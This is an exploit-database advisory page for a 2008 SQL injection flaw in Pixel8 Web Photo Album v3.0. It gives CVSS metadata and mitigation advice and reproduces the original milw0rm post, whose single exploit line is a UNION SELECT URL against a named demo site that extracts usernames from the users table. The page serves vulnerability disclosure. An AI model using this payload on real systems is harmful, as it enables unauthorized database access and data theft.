Pixel8 Web Photo Album v3.0

vendor:

Pixel8 Web Photo Album

by:

AlpHaNiX

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Pixel8 Web Photo Album

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE: N/A

CPE: a:pixel8:pixel8_web_photo_album:3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Pixel8 Web Photo Album v3.0

A SQL injection vulnerability exists in Pixel8 Web Photo Album v3.0. An attacker can send a malicious HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the vulnerable parameter. This can be exploited to disclose the content of the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use stored procedures and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.nullarea.net
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Pixel8 Web Photo Album v3.0
#download : null
#Demo     : http://www.jayeshp.com/Pixel8/Files/Demo.asp


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.jayeshp.com/Pixel8/Demo/Files/Photo.asp?Index=1&NEXTPID=1149&OSet=0&UPDEL=Yes&AlbumID=4+and+1=0+union+select+username,username,3+from+users


#Greetz For NullArea members

###########################################################################

# milw0rm.com [2008-12-30]